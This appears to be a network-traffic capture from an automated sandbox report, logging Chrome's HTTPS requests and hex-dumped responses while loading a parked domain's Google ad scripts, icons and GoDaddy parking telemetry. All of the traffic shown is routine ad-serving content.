                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:23 UTC748OUTGET /ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21 HTTP/1.1
                                                                          Host: afs.googleusercontent.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://syndicatedsearch.goog/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:23 UTC788INHTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Vary: Accept-Encoding
                                                                          Content-Type: image/svg+xml
                                                                          Content-Security-Policy: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/afs-native-asset-managers
                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="afs-native-asset-managers"
                                                                          Report-To: {"group":"afs-native-asset-managers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/afs-native-asset-managers"}]}
                                                                          Content-Length: 391
                                                                          Date: Thu, 29 Aug 2024 15:12:23 GMT
                                                                          Expires: Fri, 30 Aug 2024 14:12:23 GMT
                                                                          Cache-Control: public, max-age=82800
                                                                          Last-Modified: Thu, 20 Jul 2023 22:48:00 GMT
                                                                          X-Content-Type-Options: nosniff
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-08-29 15:12:23 UTC391INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 27 23 30 66 31 63 32 31 27 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 30 30 22 20 68 65 69 67 68 74 3d 22 32 30 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 2e 35 20 31 34 68 2d 2e 37 39 6c 2d 2e 32 38 2d 2e 32 37 43 31 35 2e 34 31 20 31 32 2e 35 39 20 31 36 20 31 31 2e 31 31 20 31 36 20 39 2e 35 20 31 36 20 35 2e 39 31 20 31 33 2e 30 39 20 33 20 39 2e 35 20 33 53 33 20 35 2e 39 31 20 33 20 39 2e 35 20 35 2e 39 31 20 31 36 20 39 2e 35 20 31 36 63 31 2e 36 31 20 30 20 33 2e 30 39 2d 2e 35 39 20 34 2e 32 33 2d 31 2e 35 37 6c 2e 32 37 2e 32 38 76 2e 37 39 6c 35 20 34 2e 39 39 4c
                                                                          Data Ascii: <svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          24192.168.2.553779142.250.186.1614434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:23 UTC749OUTGET /ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21 HTTP/1.1
                                                                          Host: afs.googleusercontent.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://syndicatedsearch.goog/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:23 UTC796INHTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Content-Security-Policy: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/afs-native-asset-managers
                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="afs-native-asset-managers"
                                                                          Report-To: {"group":"afs-native-asset-managers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/afs-native-asset-managers"}]}
                                                                          Content-Length: 200
                                                                          X-Content-Type-Options: nosniff
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Date: Thu, 29 Aug 2024 15:12:23 GMT
                                                                          Expires: Fri, 30 Aug 2024 14:12:23 GMT
                                                                          Cache-Control: public, max-age=82800
                                                                          Last-Modified: Thu, 02 Nov 2023 22:48:00 GMT
                                                                          Content-Type: image/svg+xml
                                                                          Vary: Accept-Encoding
                                                                          Age: 0
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-08-29 15:12:23 UTC200INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 27 23 30 66 31 63 32 31 27 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 77 69 64 74 68 3d 22 32 34 22 3e 3c 70 61 74 68 20 64 3d 22 4d 30 20 30 68 32 34 76 32 34 48 30 7a 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 35 2e 38 38 20 34 2e 31 32 4c 31 33 2e 37 36 20 31 32 6c 2d 37 2e 38 38 20 37 2e 38 38 4c 38 20 32 32 6c 31 30 2d 31 30 4c 38 20 32 7a 22 2f 3e 3c 2f 73 76 67 3e
                                                                          Data Ascii: <svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><path d="M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z"/></svg>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          25192.168.2.55378554.174.215.774434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:24 UTC549OUTOPTIONS /v1/parkingEvents?abp=1&gdabp=true HTTP/1.1
                                                                          Host: api.aws.parking.godaddy.com
                                                                          Connection: keep-alive
                                                                          Accept: */*
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          Origin: https://www.onefordvd.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:25 UTC643INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:25 GMT
                                                                          Content-Type: text/plain
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          Set-Cookie: AWSALB=Q7/rfyb08fr7bSkY4TryTaenm8DmeXFZBLp4q8IVaezKNWjfmCYR3aCuDUtOI+ngqwM8PSi5MfobZvxtZi629HcCCXd5hh+ABT0HypuSmgzxo3wm9hcrgePk1pY+; Expires=Thu, 05 Sep 2024 15:12:25 GMT; Path=/
                                                                          Set-Cookie: AWSALBCORS=Q7/rfyb08fr7bSkY4TryTaenm8DmeXFZBLp4q8IVaezKNWjfmCYR3aCuDUtOI+ngqwM8PSi5MfobZvxtZi629HcCCXd5hh+ABT0HypuSmgzxo3wm9hcrgePk1pY+; Expires=Thu, 05 Sep 2024 15:12:25 GMT; Path=/; SameSite=None; Secure
                                                                          access-control-allow-methods: POST
                                                                          access-control-allow-headers: content-type
                                                                          access-control-allow-origin: *


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          26192.168.2.553787142.250.184.2384434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:24 UTC373OUTGET /adsense/domains/caf.js?pac=0 HTTP/1.1
                                                                          Host: syndicatedsearch.goog
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:25 UTC845INHTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Vary: Accept-Encoding
                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/ads-afs-ui
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="ads-afs-ui"
                                                                          Report-To: {"group":"ads-afs-ui","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-afs-ui"}]}
                                                                          Content-Length: 153712
                                                                          Date: Thu, 29 Aug 2024 15:12:25 GMT
                                                                          Expires: Thu, 29 Aug 2024 15:12:25 GMT
                                                                          Cache-Control: private, max-age=3600
                                                                          ETag: "14480395013971742414"
                                                                          X-Content-Type-Options: nosniff
                                                                          Link: <https://syndicatedsearch.goog>; rel="preconnect"
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-08-29 15:12:25 UTC545INData Raw: 69 66 28 21 77 69 6e 64 6f 77 5b 27 67 6f 6f 67 6c 65 4e 44 54 5f 27 5d 29 7b 77 69 6e 64 6f 77 5b 27 67 6f 6f 67 6c 65 4e 44 54 5f 27 5d 3d 28 6e 65 77 20 44 61 74 65 28 29 29 2e 67 65 74 54 69 6d 65 28 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 41 6c 74 4c 6f 61 64 65 72 3d 33 3b 76 61 72 20 73 66 66 65 44 61 74 61 5f 3d 7b 73 65 72 76 69 63 65 5f 68 6f 73 74 3a 22 73 79 6e 64 69 63 61 74 65 64 73 65 61 72 63 68 2e 67 6f 6f 67 22 2c 68 61 73 68 3a 22 31 32 30 30 30 38 36 37 35 38 31 34 38 36 32 32 33 32 35 35 22 2c 70 61 63 6b 61 67 65 73 3a 22 64 6f 6d 61 69 6e 73 22 2c 6d 6f 64 75 6c 65 3a 22 61 64 73 22 2c 76 65 72 73 69 6f 6e 3a 22 31 22 2c 6d 3a 7b 63 65 69 3a 22 31 37 33 30 31 34 33 31 2c 31 37 33 30 31
                                                                          Data Ascii: if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"syndicatedsearch.goog",hash:"12000867581486223255",packages:"domains",module:"ads",version:"1",m:{cei:"17301431,17301
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 65 53 65 72 76 65 72 50 72 6f 76 69 64 65 64 44 6f 6d 61 69 6e 22 3a 74 72 75 65 2c 22 5f 77 61 69 74 4f 6e 43 6f 6e 73 65 6e 74 46 6f 72 46 69 72 73 74 50 61 72 74 79 43 6f 6f 6b 69 65 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 45 6e 68 61 6e 63 65 64 54 61 72 67 65 74 69 6e 67 52 73 6f 6e 63 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 4e 6f 6e 62 6c 6f 63 6b 69 6e 67 53 61 73 43 6f 6f 6b 69 65 22 3a 74 72 75 65 7d 2c 6d 64 70 3a 31 38 30 30 30 30 30 2c 73 73 64 6c 3a 22 59 58 42 77 63 33 42 76 64 43 35 6a 62 32 30 73 59 6d 78 76 5a 33 4e 77 62 33 51 75 59 32 39 74 4c 47 4a 79 4c 6d 4e 76 62 53 78 6a 62 79 35 6a 62 32 30 73 59 32 78 76 64 57 52 6d 63 6d 39 75 64 43 35 75 5a 58 51 73 5a 58 55 75 59 32 39 74 4c 47 68 76 63 48 52 76 4c 6d 39 79 5a 79 78 70 62
                                                                          Data Ascii: eServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpb
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 2e 6d 65 7d 3b 76 61 72 20 64 3d 22 6a 73 63 6f 6d 70 5f 73 79 6d 62 6f 6c 5f 22 2b 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 31 45 39 3e 3e 3e 30 29 2b 22 5f 22 2c 65 3d 30 3b 72 65 74 75 72 6e 20 62 7d 29 3b 0a 71 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 29 72 65 74 75 72 6e 20 61 3b 61 3d 53 79 6d 62 6f 6c 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 29 3b 66 6f 72 28 76 61 72 20 62 3d 22 41 72 72 61 79 20 49 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 20 49 6e 74 31 36 41 72 72 61 79 20 55 69 6e 74 31 36 41 72 72 61 79 20 49 6e 74 33 32 41 72 72 61 79 20 55 69 6e 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 33 32
                                                                          Data Ascii: .me};var d="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",e=0;return b});q("Symbol.iterator",function(a){if(a)return a;a=Symbol("Symbol.iterator");for(var b="Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 20 66 6f 72 28 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 63 21 3d 22 70 72 6f 74 6f 74 79 70 65 22 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 62 2c 63 29 3b 64 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 63 2c 64 29 7d 65 6c 73 65 20 61 5b 63 5d 3d 62 5b 63 5d 3b 61 2e 70 67 3d 62 2e 70 72 6f 74 6f 74 79 70 65 7d 66 75 6e 63 74 69 6f 6e 20 71 61 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 4e 75 6d 62 65 72 28 74 68 69 73 29 2c 62 3d 5b 5d 2c 63 3d 61 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 62 5b 63 2d 61 5d 3d 61 72 67 75 6d 65 6e 74 73 5b
                                                                          Data Ascii: for(var c in b)if(c!="prototype")if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.pg=b.prototype}function qa(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=arguments[
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 3b 72 65 74 75 72 6e 7d 74 79 70 65 6f 66 20 68 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 74 68 69 73 2e 67 67 28 68 2c 67 29 3a 74 68 69 73 2e 4a 64 28 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 59 63 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 74 68 69 73 2e 61 65 28 32 2c 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 4a 64 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 74 68 69 73 2e 61 65 28 31 2c 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 61 65 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 69 66 28 74 68 69 73 2e 42 21 3d 30 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 73 65 74 74 6c 65 28 22 2b 67 2b 22 2c 20 22 2b 68 2b 22 29 3a 20 50 72 6f 6d 69 73 65 20 61 6c 72 65 61 64 79 20 73 65 74 74 6c 65 64 20 69 6e 20 73 74 61 74 65 22 2b 74
                                                                          Data Ascii: ;return}typeof h=="function"?this.gg(h,g):this.Jd(g)};b.prototype.Yc=function(g){this.ae(2,g)};b.prototype.Jd=function(g){this.ae(1,g)};b.prototype.ae=function(g,h){if(this.B!=0)throw Error("Cannot settle("+g+", "+h+"): Promise already settled in state"+t
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 70 65 2e 68 62 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 0a 68 29 7b 66 75 6e 63 74 69 6f 6e 20 6b 28 29 7b 73 77 69 74 63 68 28 6c 2e 42 29 7b 63 61 73 65 20 31 3a 67 28 6c 2e 55 61 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 68 28 6c 2e 55 61 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 45 72 72 6f 72 28 22 55 6e 65 78 70 65 63 74 65 64 20 73 74 61 74 65 3a 20 22 2b 6c 2e 42 29 3b 7d 7d 76 61 72 20 6c 3d 74 68 69 73 3b 74 68 69 73 2e 7a 61 3d 3d 6e 75 6c 6c 3f 66 2e 75 64 28 6b 29 3a 74 68 69 73 2e 7a 61 2e 70 75 73 68 28 6b 29 3b 74 68 69 73 2e 4d 64 3d 21 30 7d 3b 62 2e 72 65 73 6f 6c 76 65 3d 64 3b 62 2e 72 65 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 62 28 66 75 6e 63 74 69 6f 6e 28 68 2c 6b
                                                                          Data Ascii: pe.hb=function(g,h){function k(){switch(l.B){case 1:g(l.Ua);break;case 2:h(l.Ua);break;default:throw Error("Unexpected state: "+l.B);}}var l=this;this.za==null?f.ud(k):this.za.push(k);this.Md=!0};b.resolve=d;b.reject=function(g){return new b(function(h,k
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 65 6e 67 74 68 29 29 3b 66 6f 72 28 76 61 72 20 65 3d 62 2e 6c 65 6e 67 74 68 3b 65 3e 30 26 26 63 3e 30 3b 29 69 66 28 64 5b 2d 2d 63 5d 21 3d 62 5b 2d 2d 65 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 65 3c 3d 30 7d 7d 29 3b 0a 71 28 22 57 65 61 6b 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 6b 29 7b 74 68 69 73 2e 4b 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6b 29 7b 6b 3d 75 28 6b 29 3b 66 6f 72 28 76 61 72 20 6c 3b 21 28 6c 3d 6b 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6c 3d 6c 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6c 5b 30 5d 2c 6c 5b 31 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20
                                                                          Data Ascii: ength));for(var e=b.length;e>0&&c>0;)if(d[--c]!=b[--e])return!1;return e<=0}});q("WeakMap",function(a){function b(k){this.Ka=(h+=Math.random()+1).toString();if(k){k=u(k);for(var l;!(l=k.next()).done;)l=l.value,this.set(l[0],l[1])}}function c(){}function
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 3d 6c 2e 68 65 61 64 3b 29 72 65 74 75 72 6e 20 6c 3d 6c 2e 6e 65 78 74 2c 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 6b 28 6c 29 7d 3b 6c 3d 6e 75 6c 6c 7d 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 68 2c 6b 29 7b 76 61 72 20 6c 3d 6b 26 26 74 79 70 65 6f 66 20 6b 3b 6c 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 66 2e 68 61 73 28 6b 29 3f 6c 3d 66 2e 67 65 74 28 6b 29 3a 28 6c 3d 22 22 2b 20 2b 2b 67 2c 66 2e 73 65 74 28 6b 2c 6c 29 29 3a 6c 3d 22 70 5f 22 2b 6b 3b 76 61 72 20 6e 3d 68 5b 30 5d 5b 6c 5d 3b 69 66 28 6e 26 26 72 61 28 68 5b 30 5d 2c 6c 29 29 66 6f 72 28 68 3d 30 3b 68 3c 6e 2e 6c 65 6e 67 74 68 3b 68 2b 2b 29 7b 76 61 72
                                                                          Data Ascii: =l.head;)return l=l.next,{done:!1,value:k(l)};l=null}return{done:!0,value:void 0}})}function d(h,k){var l=k&&typeof k;l=="object"||l=="function"?f.has(k)?l=f.get(k):(l=""+ ++g,f.set(k,l)):l="p_"+k;var n=h[0][l];if(n&&ra(h[0],l))for(h=0;h<n.length;h++){var
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 58 3d 62 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 68 29 2e 49 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 28 68 3d 64 28 74 68 69 73 2c 68 29 2e 49 29 26 26 68 2e 76 61 6c 75 65 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 5b 68 2e 6b 65 79 2c 68 2e 76 61 6c 75 65 5d 7d 29
                                                                          Data Ascii: pe.clear=function(){this[0]={};this[1]=this[1].X=b();this.size=0};e.prototype.has=function(h){return!!d(this,h).I};e.prototype.get=function(h){return(h=d(this,h).I)&&h.value};e.prototype.entries=function(){return c(this,function(h){return[h.key,h.value]})
                                                                          2024-08-29 15:12:25 UTC1390INData Raw: 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 61 3a 7b 76 61 72 20 64 3d 74 68 69 73 3b 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 64 3d 53 74 72 69 6e 67 28 64 29 29 3b 66 6f 72 28 76 61 72 20 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 30 3b 66 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 67 3d 64 5b 66 5d 3b 69 66 28 62 2e 63 61 6c 6c 28 63 2c 67 2c 66 2c 64 29 29 7b 62 3d 67 3b 62 72 65 61 6b 20 61 7d 7d 62 3d 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 62 7d 7d 29 3b 71 28 22 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 5b 5d 2c 64 3b 66 6f 72 28 64 20
                                                                          Data Ascii: ",function(a){return a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var g=d[f];if(b.call(c,g,f,d)){b=g;break a}}b=void 0}return b}});q("Object.values",function(a){return a?a:function(b){var c=[],d;for(d


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.2.553788216.58.206.684434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:24 UTC668OUTGET /js/bg/qfimbA0GYhgyETKN2gHT05d-Hpg6wiB8plDJ1aMSf3s.js HTTP/1.1
                                                                          Host: www.google.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://syndicatedsearch.goog/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:25 UTC799INHTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Vary: Accept-Encoding
                                                                          Content-Type: text/javascript
                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="botguard-scs"
                                                                          Report-To: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]}
                                                                          Content-Length: 54789
                                                                          Date: Thu, 29 Aug 2024 15:12:25 GMT
                                                                          Expires: Fri, 29 Aug 2025 15:12:25 GMT
                                                                          Cache-Control: public, max-age=31536000
                                                                          Last-Modified: Wed, 21 Aug 2024 13:30:00 GMT
                                                                          X-Content-Type-Options: nosniff
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
